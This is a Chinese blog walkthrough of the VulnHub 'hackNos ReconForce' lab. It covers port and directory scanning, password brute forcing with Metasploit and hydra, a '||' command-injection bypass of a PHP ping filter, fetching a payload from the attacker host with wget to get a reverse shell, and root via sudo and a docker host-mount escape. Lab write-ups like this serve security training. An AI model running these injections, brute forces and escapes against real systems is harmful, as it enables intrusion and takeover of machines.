靶机测试ReconForce笔记

最新推荐文章于 2024-09-19 16:51:51 发布

夜yesec

最新推荐文章于 2024-09-19 16:51:51 发布

阅读量605

点赞数

分类专栏：靶机实战笔记安全远程命令执行文章标签：网络安全系统安全开发语言 php 安全 Powered by 金山文档

本文链接：https://blog.csdn.net/qq_56426046/article/details/128671527

版权

安全同时被 3 个专栏收录

98 篇文章 14 订阅

订阅专栏

靶机实战笔记

28 篇文章 8 订阅

订阅专栏

远程命令执行

5 篇文章 0 订阅

订阅专栏

靶机地址

https://www.vulnhub.com/entry/hacknos-reconforce,416/

靶机测试

信息收集

nmap扫描端口

nmap扫描结果

└─$ nmap -sC -sV 192.168.1.100 -oA hack                                                                                                                                                                      139 ⨯
Starting Nmap 7.92 ( https://nmap.org ) at 2023-01-13 09:35 CST
Nmap scan report for 192.168.1.100
Host is up (0.00054s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 2.0.8 or later
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:192.168.1.53
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 2
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open  ssh     OpenSSH 8.0p1 Ubuntu 6build1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 6f:96:94:65:72:80:08:93:23:90:20:bc:76:df:b8:ec (RSA)
|   256 6f:bb:49:1a:a9:b6:e5:00:84:19:a0:e4:2b:c4:57:c4 (ECDSA)
|_  256 ce:3d:94:05:f4:a6:82:c4:7f:3f:ba:37:1d:f6:23:b0 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title:  Recon_Web
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.12 seconds
zsh: segmentation fault  nmap -sC -sV 192.168.1.100 -oA hack

开放21,22,80端口ftp允许匿名用户，

目录扫描

─$ gobuster dir -u http://192.168.1.100 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php -t 100
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.1.100
[+] Method:                  GET
[+] Threads:                 100
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              php
[+] Timeout:                 10s
===============================================================
2023/01/13 09:44:24 Starting gobuster in directory enumeration mode
===============================================================
/css                  (Status: 301) [Size: 312] [--> http://192.168.1.100/css/]
/server-status        (Status: 403) [Size: 278]                                
Progress: 296340 / 441122 (67.18%)                                            ^C
[!] Keyboard interrupt detected, terminating.

访问主页

点击这里弹出登录框

ftp 匿名登录

ftp 允许匿名登录但是目录没有任何内容但是有登录提示 Secure@hackNos

python 组合密码

word = ['Recon','Security','5ecure','Secure']
for i in word:
    print(i+'@hackNos')

破解基础认证

msfconsole
use auxiliary/scanner/http/http_login

admin:Security@hackNos

命令执行漏洞

分析源码

127.0.0.1||ls
127.0.0.1||cat out.php


<pre><?php

if( isset( $_POST[ 'Submit' ]  ) ) {
    // Get input
    $target = trim($_REQUEST[ 'ip' ]);

    // Set blacklist
    $substitutions = array(
        '&'  => '',
        ';'  => '',
        '| ' => '',
        '-'  => '',
        '$'  => '',
        '('  => '',
        ')'  => '',
        '`'  => '',
        '||' => '',
    );

    // Remove any of the charactars in the array (blacklist).
    $target = str_replace( array_keys( $substitutions ), $substitutions, $target );

    // Determine OS and execute the ping command.
    if( stristr( php_uname( 's' ), 'Windows NT' ) ) {
        // Windows
        $cmd = shell_exec( 'ping  ' . $target );
    }
    else {
        // *nix
        $cmd = shell_exec( 'ping  -c 4 ' . $target );
    }

    // Feedback for the end user
    echo "<pre>{$cmd}</pre>";
}

?> 
</pre>

过滤众多字符，上面的组合刚好绕过

反弹shell

下载文件

||wget http://192.168.1.53/1.php

nc -lvnp 90

python -c 'import pty;pty.spawn("/bin/bash")'

获得交互shell

测试用户 recon 密码

cat /etc/passwd | grep bash
root:x:0:0:root:/root:/bin/bash
recon:x:1000:119:rahul:/home/recon:/bin/bash

获得user.txt

hydra 测试密码

└─$ hydra -l recon -P pass ssh://192.168.1.100

ssh登录 recon 用户

└─$ ssh recon@192.168.1.100

sudo -l

recon用户有所有权限

查看root.txt

特权提升

方法一

ls -la

查看有sudo_as_admin_successful

sudo -l 输入密码 Security@hackNos

看到可以执行任何命令

方法二

id
groups

存在 docker 组可以用 docker 提权

docker images
创建容器 shell
docker run -v /:/mnt --rm -it alpine chroot /mnt sh
自动下载 alpine 文件
创建宿主根目录到 mbt 目录
docker run -it -v /:/mbt e7d92cdc71fe
cd /mbt
cat root/root.txt